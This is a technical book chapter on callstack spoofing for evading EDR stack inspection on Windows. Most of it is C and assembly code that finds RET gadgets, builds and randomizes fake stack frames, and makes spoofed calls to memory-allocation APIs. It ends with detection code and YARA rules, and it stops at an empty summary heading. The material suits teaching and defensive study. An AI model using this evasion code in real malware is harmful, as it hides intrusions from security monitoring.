Chapter 19

Chapter 19: Callstack Spoofing

The Forensics of Function Calls

Modern EDR systems have evolved beyond simple API hooking. They now examine the call stack at the moment of sensitive API invocations, asking a crucial question: "Where did this call originate?" When NtAllocateVirtualMemory is called directly from an unknown memory region rather than through the expected kernel32.dll → kernelbase.dll → ntdll.dll chain, alarm bells ring. Callstack spoofing addresses this by constructing fake stack frames that make malicious calls appear to originate from legitimate code paths.

Understanding callstack analysis and spoofing requires deep knowledge of x64 calling conventions, stack frame layout, and the Windows exception handling infrastructure. This chapter explores how security products analyze stacks, why certain patterns trigger detection, and the techniques used to construct convincing false call histories.

THE CALLSTACK ANALYSIS PROBLEM
==============================

SUSPICIOUS CALL (Detected):
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  NtAllocateVirtualMemory called from:                              │
│                                                                     │
│  ┌───────────────────────────────────────────────────────────┐     │
│  │ Stack Frame 0: ntdll!NtAllocateVirtualMemory              │     │
│  │   Return Address: 0x00000001400012AB  ◄── UNKNOWN MODULE! │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 1: ??? (0x00000001400012AB)                   │     │
│  │   Return Address: 0x0000000140001000  ◄── RWX MEMORY!    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 2: ???                                        │     │
│  │   Return Address: (invalid)           ◄── BROKEN CHAIN!   │     │
│  └───────────────────────────────────────────────────────────┘     │
│                                                                     │
│  EDR Analysis: "Direct syscall from unbacked memory"                │
│  Result: BLOCKED / ALERT                                            │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

LEGITIMATE CALL (Expected):
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  NtAllocateVirtualMemory called from:                              │
│                                                                     │
│  ┌───────────────────────────────────────────────────────────┐     │
│  │ Stack Frame 0: ntdll!NtAllocateVirtualMemory              │     │
│  │   Return Address: kernelbase+0x1A2B3 ◄── Known offset    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 1: kernelbase!VirtualAllocEx                  │     │
│  │   Return Address: kernel32+0x5C7D2  ◄── Expected chain    │     │
│  ├───────────────────────────────────────────────────────────┤     │
│  │ Stack Frame 2: kernel32!VirtualAlloc                      │     │
│  │   Return Address: app.exe+0x12AB    ◄── Signed module     │     │
│  └───────────────────────────────────────────────────────────┘     │
│                                                                     │
│  EDR Analysis: "Normal API call chain"                              │
│  Result: ALLOWED                                                    │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Part 1: Understanding x64 Stack Architecture

Before we can spoof call stacks, we must thoroughly understand how they're constructed. The x64 calling convention defines specific rules for parameter passing, stack alignment, and frame organization.

The x64 Calling Convention

On 64-bit Windows, the first four integer/pointer arguments pass in registers (RCX, RDX, R8, R9), while additional arguments go on the stack. Every function call must maintain 16-byte stack alignment and provide a 32-byte "shadow space" for the callee to save register parameters.

x64 STACK FRAME ANATOMY
=======================

When Function A calls Function B:

High Memory
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  Function A's Stack Frame                                       │
│  ├── A's local variables                                        │
│  ├── A's saved non-volatile registers (if any)                 │
│  │                                                              │
│  │   [Before CALL instruction, RSP points here]                │
│  │   ▼                                                          │
│  ├── Parameter 5 (if exists)              [RSP+0x28]           │
│  ├── Parameter 6 (if exists)              [RSP+0x30]           │
│  ├── ...more parameters...                                      │
│  │                                                              │
│  ├── Shadow space for RCX                 [RSP+0x08]           │
│  ├── Shadow space for RDX                 [RSP+0x10]           │
│  ├── Shadow space for R8                  [RSP+0x18]           │
│  ├── Shadow space for R9                  [RSP+0x20]           │
│                                                                 │
├─────────────────────────────────────────────────────────────────┤
│  CALL instruction executes → pushes return address              │
├─────────────────────────────────────────────────────────────────┤
│  Return Address (8 bytes)                 [RSP]     ◄── Key!   │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Function B's Stack Frame (after prologue)                      │
│  ├── Saved RBP (if frame pointer used)    [RSP-0x08]           │
│  ├── Saved non-volatile registers                               │
│  ├── Local variables                                            │
│  ├── ...                                                        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘
Low Memory


Key Points:
• Return address is at [RSP] immediately after CALL
• Shadow space (32 bytes) is mandatory for every call
• Stack must be 16-byte aligned BEFORE the call
• RBP may or may not be used as frame pointer

The RBP Frame Pointer Chain

Traditional stack walking relies on the frame pointer (RBP) forming a linked list. Each frame's saved RBP points to the previous frame's RBP, creating a chain that can be traversed to enumerate all callers.

// Manual stack walk using RBP chain
void WalkStackUsingRBP(void) {
    PVOID pCurrentRbp;
    PVOID pCurrentRip;

    // Get current RBP
#ifdef _WIN64
    pCurrentRbp = (PVOID)__readgsqword(0);  // Not actually correct - for illustration
    // Real code would use assembly or RtlCaptureContext
#endif

    printf("Stack Walk via RBP Chain:\n");

    int nFrame = 0;
    while (pCurrentRbp && nFrame < 20) {
        // At each frame:
        // [RBP]     = saved previous RBP (next in chain)
        // [RBP+8]   = return address

        PVOID pPrevRbp = *(PVOID*)pCurrentRbp;
        PVOID pRetAddr = *(PVOID*)((PBYTE)pCurrentRbp + 8);

        printf("  Frame %d: RBP=0x%p, Return=0x%p\n",
            nFrame, pCurrentRbp, pRetAddr);

        pCurrentRbp = pPrevRbp;
        nFrame++;
    }
}

However, many x64 functions omit the frame pointer (FPO - Frame Pointer Omission) to use RBP as a general-purpose register. These functions rely on metadata for stack walking instead.

Part 2: Windows Exception Handling and Stack Walking

Windows doesn't rely solely on frame pointers for stack walking. Instead, it uses rich metadata stored in the PE file that describes each function's stack usage.

RUNTIME_FUNCTION and UNWIND_INFO

Every non-leaf function in a PE file has a corresponding RUNTIME_FUNCTION entry in the .pdata section. This entry describes where the function starts, ends, and points to UNWIND_INFO describing how to restore the stack.

EXCEPTION HANDLING METADATA
===========================

.pdata Section (RUNTIME_FUNCTION array):
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  RUNTIME_FUNCTION Entry:                                        │
│  ┌─────────────────────────────────────────────────────────┐   │
│  │ BeginAddress  (DWORD) ─► RVA of function start          │   │
│  │ EndAddress    (DWORD) ─► RVA of function end            │   │
│  │ UnwindData    (DWORD) ─► RVA of UNWIND_INFO             │   │
│  └─────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Example:                                                       │
│  { 0x00001000, 0x00001500, 0x00008000 }                        │
│                                                                 │
│  Means: Function at RVA 0x1000-0x1500, unwind at 0x8000        │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

UNWIND_INFO Structure:
┌─────────────────────────────────────────────────────────────────┐
│                                                                 │
│  ┌─────────────────────────────────────────────────────────┐   │
│  │ Version (3 bits)        │ Usually 1                     │   │
│  │ Flags (5 bits)          │ UNW_FLAG_* values             │   │
│  │ SizeOfProlog (byte)     │ Size of function prologue     │   │
│  │ CountOfCodes (byte)     │ Number of unwind codes        │   │
│  │ FrameRegister (4 bits)  │ Which register is frame ptr   │   │
│  │ FrameOffset (4 bits)    │ Offset from RSP to frame      │   │
│  │ UnwindCode[n]           │ Array of unwind operations    │   │
│  └─────────────────────────────────────────────────────────┘   │
│                                                                 │
│  Unwind codes describe stack operations:                        │
│  • UWOP_PUSH_NONVOL    - Register was pushed                   │
│  • UWOP_ALLOC_LARGE    - Large stack allocation                │
│  • UWOP_ALLOC_SMALL    - Small stack allocation                │
│  • UWOP_SET_FPREG      - Frame pointer established             │
│  • etc.                                                         │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

RtlVirtualUnwind: The Stack Walking Engine

Windows uses RtlVirtualUnwind to walk the stack one frame at a time. Given a context (register state) and the current instruction pointer, it finds the RUNTIME_FUNCTION, decodes the UNWIND_INFO, and computes the previous frame's state.

#include <windows.h>

// Demonstrate RtlVirtualUnwind usage
void WalkStackProperly(PCONTEXT pContext) {
    CONTEXT ctx = *pContext;
    KNONVOLATILE_CONTEXT_POINTERS nvCtx = { 0 };

    printf("Stack Walk via RtlVirtualUnwind:\n");

    int nFrame = 0;
    while (ctx.Rip && nFrame < 20) {
        // Lookup RUNTIME_FUNCTION for current RIP
        DWORD64 dwImageBase = 0;
        PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
            ctx.Rip,
            &dwImageBase,
            NULL  // Dynamic function table
        );

        printf("  Frame %d: RIP=0x%llX", nFrame, ctx.Rip);

        if (pRtFunc) {
            // Has unwind info - use it
            PVOID pHandlerData = NULL;
            DWORD64 dwEstablisherFrame = 0;

            RtlVirtualUnwind(
                UNW_FLAG_NHANDLER,
                dwImageBase,
                ctx.Rip,
                pRtFunc,
                &ctx,
                &pHandlerData,
                &dwEstablisherFrame,
                &nvCtx
            );

            printf(" (has RUNTIME_FUNCTION)\n");
        }
        else {
            // Leaf function - return address is at [RSP]
            ctx.Rip = *(PDWORD64)ctx.Rsp;
            ctx.Rsp += 8;
            printf(" (leaf function)\n");
        }

        nFrame++;
    }
}

Part 3: How EDRs Analyze Call Stacks

Understanding what EDRs look for helps us understand what we need to fake. Modern EDRs perform sophisticated stack analysis during sensitive operations.

Detection Criteria

EDR STACK ANALYSIS CHECKLIST
============================

For each stack frame, EDRs typically verify:

1. MODULE BACKING
   ┌────────────────────────────────────────────────────────────┐
   │ • Is the return address within a loaded module?            │
   │ • Is that module signed? Trusted?                         │
   │ • Is it mapped from disk (not private memory)?            │
   └────────────────────────────────────────────────────────────┘
   Detection: Direct syscall from shellcode → ALERT

2. VALID CHAIN
   ┌────────────────────────────────────────────────────────────┐
   │ • Does the RBP chain form a valid linked list?            │
   │ • Are all RBP values within the thread's stack?           │
   │ • Does the chain reach a reasonable end?                   │
   └────────────────────────────────────────────────────────────┘
   Detection: Broken chain or circular reference → ALERT

3. RUNTIME_FUNCTION ENTRIES
   ┌────────────────────────────────────────────────────────────┐
   │ • Does each return address have a RUNTIME_FUNCTION?       │
   │ • Exception: Leaf functions (small, no stack alloc)       │
   │ • Exception: Dynamic code (JIT, trampolines)              │
   └────────────────────────────────────────────────────────────┘
   Detection: Return to address without metadata → SUSPICIOUS

4. RETURN ADDRESS VALIDITY
   ┌────────────────────────────────────────────────────────────┐
   │ • Is the return address right after a CALL instruction?   │
   │ • Does it make sense given the function boundaries?       │
   │ • Is it inside a known function?                          │
   └────────────────────────────────────────────────────────────┘
   Detection: Return to middle of instruction → ALERT

5. EXPECTED CALL PATTERNS
   ┌────────────────────────────────────────────────────────────┐
   │ • Does the chain match known API patterns?                │
   │ • e.g., NtAllocateVirtualMemory should be called via      │
   │   VirtualAlloc → VirtualAllocEx → NtAllocateVirtual...    │
   └────────────────────────────────────────────────────────────┘
   Detection: Unusual caller for syscall → SUSPICIOUS

Stack Capture Methods

EDRs typically capture stacks in kernel callbacks or through instrumentation. They may use:

// Kernel-mode stack capture (simplified concept)
VOID OnSyscallEntry(DWORD dwSyscallNumber) {
    KTRAP_FRAME* pTrapFrame = GetCurrentTrapFrame();

    // Capture user-mode stack from RSP
    PVOID pUserStack[32];
    ULONG ulCaptured;

    __try {
        ProbeForRead((PVOID)pTrapFrame->Rsp, 256, 1);

        for (int i = 0; i < 32; i++) {
            pUserStack[i] = *(PVOID*)(pTrapFrame->Rsp + i * 8);
        }
    }
    __except(EXCEPTION_EXECUTE_HANDLER) {
        // Invalid stack access
    }

    // Analyze captured frames
    AnalyzeStackFrames(pUserStack, 32, dwSyscallNumber);
}

Part 4: Basic Callstack Spoofing

The simplest spoofing technique replaces the return address with an address inside a legitimate module. When the EDR examines the stack, it sees a return to known code rather than our malicious module.

Finding RET Gadgets

A "gadget" is a small code sequence we can use as a fake return target. The simplest is just a RET instruction (0xC3). When execution "returns" to this gadget, it immediately returns again, continuing the chain.

#include <windows.h>

// Find a RET instruction in a legitimate module
PVOID FindRetGadget(HMODULE hModule) {
    PBYTE pBase = (PBYTE)hModule;

    // Get module bounds from PE headers
    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);
    SIZE_T sSize = pNt->OptionalHeader.SizeOfImage;

    // Search for RET (0xC3) instruction
    // Search in .text section for executable code
    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
            PBYTE pCode = pBase + pSection[i].VirtualAddress;
            SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;

            for (SIZE_T j = 0; j < sCodeSize; j++) {
                if (pCode[j] == 0xC3) {
                    return &pCode[j];
                }
            }
        }
    }

    return NULL;
}

// Find "pop rbp; ret" gadget (0x5D 0xC3)
// Useful for maintaining RBP chain
PVOID FindPopRbpRetGadget(HMODULE hModule) {
    PBYTE pBase = (PBYTE)hModule;

    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);

    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (pSection[i].Characteristics & IMAGE_SCN_CNT_CODE) {
            PBYTE pCode = pBase + pSection[i].VirtualAddress;
            SIZE_T sCodeSize = pSection[i].Misc.VirtualSize;

            for (SIZE_T j = 0; j < sCodeSize - 1; j++) {
                if (pCode[j] == 0x5D && pCode[j + 1] == 0xC3) {
                    return &pCode[j];
                }
            }
        }
    }

    return NULL;
}

Building Fake Return Addresses

For more convincing spoofing, we find addresses that look like real return addresses—locations immediately after CALL instructions within legitimate functions.

#include <windows.h>

typedef struct _CALL_SITE_INFO {
    PVOID pAddress;       // Address right after CALL instruction
    PVOID pFunctionStart; // Start of containing function
    SIZE_T sOffset;       // Offset within function
} CALL_SITE_INFO, *PCALL_SITE_INFO;

// Find addresses that follow CALL instructions
// These look like legitimate return addresses
DWORD FindCallSites(
    HMODULE hModule,
    PCALL_SITE_INFO pSites,
    DWORD dwMaxSites
) {
    PBYTE pBase = (PBYTE)hModule;

    PIMAGE_DOS_HEADER pDos = (PIMAGE_DOS_HEADER)pBase;
    PIMAGE_NT_HEADERS pNt = (PIMAGE_NT_HEADERS)(pBase + pDos->e_lfanew);

    // Find .text section
    PIMAGE_SECTION_HEADER pSection = IMAGE_FIRST_SECTION(pNt);
    PBYTE pText = NULL;
    SIZE_T sTextSize = 0;

    for (WORD i = 0; i < pNt->FileHeader.NumberOfSections; i++) {
        if (strcmp((char*)pSection[i].Name, ".text") == 0) {
            pText = pBase + pSection[i].VirtualAddress;
            sTextSize = pSection[i].Misc.VirtualSize;
            break;
        }
    }

    if (!pText) return 0;

    DWORD dwFound = 0;

    // Search for CALL instructions
    for (SIZE_T i = 0; i < sTextSize - 5 && dwFound < dwMaxSites; i++) {
        // E8 xx xx xx xx = CALL rel32 (relative near call)
        if (pText[i] == 0xE8) {
            // The byte after CALL is where execution returns
            PVOID pReturnSite = &pText[i + 5];

            pSites[dwFound].pAddress = pReturnSite;
            pSites[dwFound].sOffset = i + 5;
            dwFound++;
        }
        // FF 15 xx xx xx xx = CALL [rip+rel32] (indirect call via memory)
        else if (pText[i] == 0xFF && pText[i + 1] == 0x15) {
            PVOID pReturnSite = &pText[i + 6];

            pSites[dwFound].pAddress = pReturnSite;
            pSites[dwFound].sOffset = i + 6;
            dwFound++;
        }
    }

    return dwFound;
}

Part 5: Synthetic Stack Frame Construction

More sophisticated spoofing builds complete fake stack frames that maintain proper RBP chains and shadow space. This survives deeper stack analysis.

Frame Structure

#include <windows.h>

// A synthetic stack frame
typedef struct _SYNTHETIC_FRAME {
    PVOID pSavedRbp;      // Points to next frame's saved RBP
    PVOID pReturnAddress; // Fake return address in legitimate module
    BYTE bShadowSpace[32];// Shadow space (required by calling convention)
} SYNTHETIC_FRAME, *PSYNTHETIC_FRAME;

// Collection of frames forming a fake call stack
typedef struct _SPOOF_STACK {
    BYTE bMemory[4096];        // Memory for synthetic frames
    PVOID pStackTop;           // Top of our synthetic stack
    DWORD dwFrameCount;        // Number of frames
    PVOID pRealReturnAddress;  // Where to actually return
} SPOOF_STACK, *PSPOOF_STACK;

Building the Synthetic Stack

#include <windows.h>

typedef struct _GADGET_COLLECTION {
    PVOID pGadgets[32];
    char szModules[32][64];
    DWORD dwCount;
} GADGET_COLLECTION, *PGADGET_COLLECTION;

// Collect gadgets from multiple trusted modules
BOOL CollectGadgets(PGADGET_COLLECTION pColl) {
    const wchar_t* wszModules[] = {
        L"kernel32.dll",
        L"kernelbase.dll",
        L"ntdll.dll",
        L"user32.dll",
        L"advapi32.dll",
        NULL
    };

    pColl->dwCount = 0;

    for (int i = 0; wszModules[i] && pColl->dwCount < 32; i++) {
        HMODULE hMod = GetModuleHandleW(wszModules[i]);
        if (!hMod) hMod = LoadLibraryW(wszModules[i]);
        if (!hMod) continue;

        PVOID pGadget = FindRetGadget(hMod);
        if (pGadget) {
            pColl->pGadgets[pColl->dwCount] = pGadget;
            WideCharToMultiByte(CP_ACP, 0, wszModules[i], -1,
                pColl->szModules[pColl->dwCount], 64, NULL, NULL);
            pColl->dwCount++;
        }
    }

    return pColl->dwCount > 0;
}

// Build a synthetic stack with specified depth
PVOID BuildSyntheticStack(
    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    PVOID pRealReturn,
    DWORD dwFrameDepth
) {
    // Start at top of our stack memory
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);

    // Reserve space and align to 16 bytes
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    // Build frames from bottom (oldest) to top (newest)
    PVOID pNextRbp = NULL;

    for (DWORD i = 0; i < dwFrameDepth; i++) {
        // Select a gadget (vary by frame for realism)
        PVOID pGadget = pGadgets->pGadgets[i % pGadgets->dwCount];

        // Reserve shadow space
        pCurrent -= 32;

        // Return address
        pCurrent -= 8;
        *(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;

        // Saved RBP (points to next frame's RBP location)
        pCurrent -= 8;
        *(PVOID*)pCurrent = pNextRbp;

        pNextRbp = pCurrent;  // This frame's RBP will be previous frame's saved RBP
    }

    pStack->pStackTop = pCurrent;
    pStack->pRealReturnAddress = pRealReturn;
    pStack->dwFrameCount = dwFrameDepth;

    return pCurrent;
}

Part 6: Assembly Implementation

Actually using the spoofed stack requires assembly code to switch stacks and make the call. C code alone cannot manipulate RSP and RBP safely during a function call.

x64 MASM Implementation

; spoofcall.asm - x64 MASM assembly for stack spoofing

.code

; GetCurrentReturnAddress - get the return address of our caller
; Returns: RAX = return address
GetReturnAddress PROC
    mov rax, [rsp]          ; Return address is at [RSP]
    ret
GetReturnAddress ENDP


; SpoofedCall - Make a call with a spoofed stack
;
; Parameters:
;   RCX = pSpoofStack      - Pointer to SPOOF_STACK structure
;   RDX = pTargetFunction  - Function to call
;   R8  = pArg1            - First argument to target
;   R9  = pArg2            - Second argument to target
;   [RSP+0x28] = pArg3     - Third argument
;   [RSP+0x30] = pArg4     - Fourth argument
;
; The SPOOF_STACK structure:
;   +0x000: Memory buffer for synthetic stack
;   +0x1000: pStackTop (PVOID)
;   +0x1008: dwFrameCount (DWORD)
;   +0x1010: pRealReturnAddress (PVOID)

SPOOF_STACK_TOP_OFFSET      EQU 1000h
SPOOF_REAL_RETURN_OFFSET    EQU 1010h

SpoofedCall PROC
    ; Save non-volatile registers
    push rbx
    push rsi
    push rdi
    push rbp
    push r12
    push r13
    push r14
    push r15

    ; Save parameters
    mov r12, rcx            ; pSpoofStack
    mov r13, rdx            ; pTargetFunction
    mov r14, r8             ; pArg1
    mov r15, r9             ; pArg2

    ; Save original stack
    mov rbx, rsp
    mov rsi, rbp

    ; Load spoofed stack pointer
    mov rsp, [r12 + SPOOF_STACK_TOP_OFFSET]

    ; Set RBP to point to first synthetic frame
    mov rbp, rsp

    ; Allocate shadow space for target call
    sub rsp, 20h

    ; Setup arguments for target function
    mov rcx, r14            ; Arg1
    mov rdx, r15            ; Arg2
    mov r8, [rbx + 68h]     ; Arg3 (from original stack, accounting for pushes)
    mov r9, [rbx + 70h]     ; Arg4

    ; Call target function
    ; EDR will see our spoofed stack when it examines!
    call r13

    ; Save return value
    mov r12, rax

    ; Restore original stack
    mov rsp, rbx
    mov rbp, rsi

    ; Return value
    mov rax, r12

    ; Restore non-volatile registers
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    pop rdi
    pop rsi
    pop rbx

    ret
SpoofedCall ENDP

END

C Wrapper

#include <windows.h>

// Assembly function declaration
extern NTSTATUS SpoofedCall(
    PSPOOF_STACK pSpoofStack,
    PVOID pTargetFunction,
    PVOID pArg1,
    PVOID pArg2,
    PVOID pArg3,
    PVOID pArg4
);

// High-level wrapper for common APIs
NTSTATUS SpoofedNtAllocateVirtualMemory(
    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
) {
    // Get the target function
    typedef NTSTATUS (NTAPI* fnNtAllocateVirtualMemory)(
        HANDLE, PVOID*, ULONG_PTR, PSIZE_T, ULONG, ULONG
    );

    fnNtAllocateVirtualMemory pNtAlloc =
        (fnNtAllocateVirtualMemory)GetProcAddress(
            GetModuleHandleW(L"ntdll.dll"),
            "NtAllocateVirtualMemory"
        );

    // Build spoofed stack with 5 frames
    BuildSyntheticStack(pStack, pGadgets, _ReturnAddress(), 5);

    // Make the call with spoofed stack
    // Note: Would need to adjust assembly for 6 parameters
    return SpoofedCall(
        pStack,
        pNtAlloc,
        (PVOID)ProcessHandle,
        (PVOID)BaseAddress,
        (PVOID)ZeroBits,
        (PVOID)RegionSize
        // AllocationType and Protect need different handling
    );
}

Part 7: Advanced Techniques

Randomization for Evasion

Static spoofed stacks create detectable patterns. Randomizing frame count and gadget selection helps evade signature-based detection.

#include <windows.h>

// Generate pseudo-random numbers without suspicious RNG calls
DWORD GetPseudoRandom(void) {
    LARGE_INTEGER li;
    QueryPerformanceCounter(&li);
    return (DWORD)(li.QuadPart ^ (li.QuadPart >> 17));
}

// Build randomized synthetic stack
PVOID BuildRandomizedStack(
    PSPOOF_STACK pStack,
    PGADGET_COLLECTION pGadgets,
    PVOID pRealReturn
) {
    // Random frame count between 4 and 10
    DWORD dwRandom = GetPseudoRandom();
    DWORD dwFrameCount = 4 + (dwRandom % 7);

    // Build with random frame count
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    PVOID pNextRbp = NULL;

    for (DWORD i = 0; i < dwFrameCount; i++) {
        // Random gadget selection
        DWORD dwGadgetIdx = (GetPseudoRandom() + i) % pGadgets->dwCount;
        PVOID pGadget = pGadgets->pGadgets[dwGadgetIdx];

        // Random shadow space padding (still 32+ bytes)
        DWORD dwPadding = 32 + (GetPseudoRandom() % 32);
        pCurrent -= dwPadding;

        // Return address
        pCurrent -= 8;
        *(PVOID*)pCurrent = (i == 0) ? pRealReturn : pGadget;

        // Saved RBP
        pCurrent -= 8;
        *(PVOID*)pCurrent = pNextRbp;
        pNextRbp = pCurrent;
    }

    pStack->pStackTop = pCurrent;
    return pCurrent;
}

Matching Expected Call Chains

The most sophisticated spoofing mimics the exact call chain that legitimate API calls produce:

#include <windows.h>

// Known API call chain patterns
typedef struct _CALL_CHAIN {
    const char* szApiName;
    const wchar_t* wszModuleChain[8]; // Module names in order
} CALL_CHAIN, *PCALL_CHAIN;

// Example known patterns
CALL_CHAIN g_KnownChains[] = {
    {
        "NtAllocateVirtualMemory",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    {
        "NtWriteVirtualMemory",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    {
        "NtCreateThreadEx",
        { L"ntdll.dll", L"kernelbase.dll", L"kernel32.dll", NULL }
    },
    { NULL, { NULL } }
};

// Build stack matching a specific API's expected chain
BOOL BuildRealisticChain(
    PSPOOF_STACK pStack,
    const char* szTargetApi,
    PVOID pRealReturn
) {
    // Find the expected chain
    PCALL_CHAIN pChain = NULL;
    for (int i = 0; g_KnownChains[i].szApiName; i++) {
        if (strcmp(g_KnownChains[i].szApiName, szTargetApi) == 0) {
            pChain = &g_KnownChains[i];
            break;
        }
    }

    if (!pChain) return FALSE;

    // Build stack with gadgets from the correct modules in order
    PBYTE pCurrent = pStack->bMemory + sizeof(pStack->bMemory);
    pCurrent -= 256;
    pCurrent = (PBYTE)((ULONG_PTR)pCurrent & ~0xF);

    PVOID pNextRbp = NULL;
    BOOL bFirstFrame = TRUE;

    for (int i = 0; pChain->wszModuleChain[i]; i++) {
        HMODULE hMod = GetModuleHandleW(pChain->wszModuleChain[i]);
        if (!hMod) continue;

        PVOID pGadget = FindRetGadget(hMod);
        if (!pGadget) continue;

        // Build frame
        pCurrent -= 32;  // Shadow space
        pCurrent -= 8;   // Return address
        *(PVOID*)pCurrent = bFirstFrame ? pRealReturn : pGadget;
        bFirstFrame = FALSE;

        pCurrent -= 8;   // Saved RBP
        *(PVOID*)pCurrent = pNextRbp;
        pNextRbp = pCurrent;
    }

    pStack->pStackTop = pCurrent;
    return TRUE;
}

Part 8: Defense and Detection

Understanding detection helps both defenders and offensive operators. Here are the key indicators of stack spoofing:

Detection Indicators

STACK SPOOFING DETECTION CHECKLIST
==================================

┌────────────────────────────────────────────────────────────────────┐
│ INDICATOR                        │ DETECTION METHOD               │
├──────────────────────────────────┼────────────────────────────────┤
│ RSP outside thread stack limits  │ Compare RSP to TEB stack info  │
│                                  │ GetCurrentThreadStackLimits()  │
├──────────────────────────────────┼────────────────────────────────┤
│ All returns to RET gadgets       │ Disassemble at each return     │
│                                  │ address; check if just "ret"   │
├──────────────────────────────────┼────────────────────────────────┤
│ Return not after CALL            │ Check byte before return addr  │
│                                  │ for CALL opcode (E8, FF)       │
├──────────────────────────────────┼────────────────────────────────┤
│ Missing RUNTIME_FUNCTION         │ RtlLookupFunctionEntry returns │
│                                  │ NULL for return addresses      │
├──────────────────────────────────┼────────────────────────────────┤
│ Impossible call chain            │ Cross-reference known API      │
│                                  │ calling patterns               │
├──────────────────────────────────┼────────────────────────────────┤
│ Uniform frame sizes              │ Measure distance between saved │
│                                  │ RBP values; too regular?       │
└────────────────────────────────────────────────────────────────────┘

Validation Code

#include <windows.h>

// Check if a stack appears to be spoofed
BOOL DetectStackSpoof(HANDLE hThread) {
    CONTEXT ctx = { 0 };
    ctx.ContextFlags = CONTEXT_FULL;

    if (!GetThreadContext(hThread, &ctx)) {
        return FALSE;
    }

    // Get legitimate stack boundaries
    NT_TIB* pTib = (NT_TIB*)NtCurrentTeb();
    PVOID pStackBase = pTib->StackBase;
    PVOID pStackLimit = pTib->StackLimit;

    // Check 1: RSP within stack limits
    if (ctx.Rsp < (DWORD64)pStackLimit || ctx.Rsp > (DWORD64)pStackBase) {
        printf("[!] RSP (0x%llX) outside stack bounds!\n", ctx.Rsp);
        return TRUE;  // Spoofed!
    }

    // Walk frames and analyze
    DWORD64 dwRbp = ctx.Rbp;
    int nGadgetReturns = 0;
    int nFrames = 0;

    while (dwRbp && nFrames < 20) {
        // Check RBP in bounds
        if (dwRbp < (DWORD64)pStackLimit || dwRbp > (DWORD64)pStackBase) {
            printf("[!] Frame %d: RBP outside stack\n", nFrames);
            return TRUE;
        }

        DWORD64 dwRetAddr = *(DWORD64*)(dwRbp + 8);

        // Check for RUNTIME_FUNCTION
        DWORD64 dwImageBase;
        PRUNTIME_FUNCTION pRtFunc = RtlLookupFunctionEntry(
            dwRetAddr, &dwImageBase, NULL);

        if (!pRtFunc) {
            printf("[?] Frame %d: No RUNTIME_FUNCTION (may be leaf)\n", nFrames);
        }

        // Check if return address is just a RET gadget
        __try {
            if (*(BYTE*)dwRetAddr == 0xC3) {
                nGadgetReturns++;
            }
        }
        __except(EXCEPTION_EXECUTE_HANDLER) {}

        dwRbp = *(DWORD64*)dwRbp;
        nFrames++;
    }

    // Heuristic: Multiple returns to bare RET is suspicious
    if (nGadgetReturns > 2) {
        printf("[!] %d frames return to RET gadgets!\n", nGadgetReturns);
        return TRUE;
    }

    return FALSE;
}

YARA Detection Rules

rule Callstack_Spoof_Gadget_Search {
    meta:
        description = "Detects code that searches for RET gadgets"

    strings:
        // Searching for 0xC3 (RET) byte
        $gadget_search1 = { 80 ?? C3 }  // cmp [reg], 0xC3
        $gadget_search2 = { 3C C3 }     // cmp al, 0xC3

        // Searching for 0x5D 0xC3 (pop rbp; ret)
        $gadget_search3 = { 66 81 ?? 5D C3 }

        // RtlLookupFunctionEntry for validation bypass
        $unwind_api = "RtlLookupFunctionEntry" ascii

        // Stack limit checking (possible evasion)
        $stack_check = "NtQueryInformationThread" ascii

    condition:
        (any of ($gadget_search*)) or
        ($unwind_api and any of ($gadget_search*))
}

rule Suspicious_Stack_Manipulation {
    meta:
        description = "Detects unusual stack pointer manipulation"

    strings:
        // Direct RSP assignment (stack switching)
        $rsp_mov1 = { 48 8B E? }        // mov rsp, reg
        $rsp_mov2 = { 48 89 ?? E4 }     // mov rsp, [reg]

        // RBP chain manipulation
        $rbp_chain = { 48 89 ?? 48 89 ?? }  // Two consecutive mov involving rbp

        // Get return address pattern
        $ret_addr = { 48 8B 04 24 }     // mov rax, [rsp]

    condition:
        2 of them
}

Summary: The Stack Spoofing Toolkit

Callstack spoofing is a sophisticated technique that exploits the gap between how EDRs analyze execution context and how that context can be artificially constructed.

TECHNIQUE EFFECTIVENESS SUMMARY
===============================

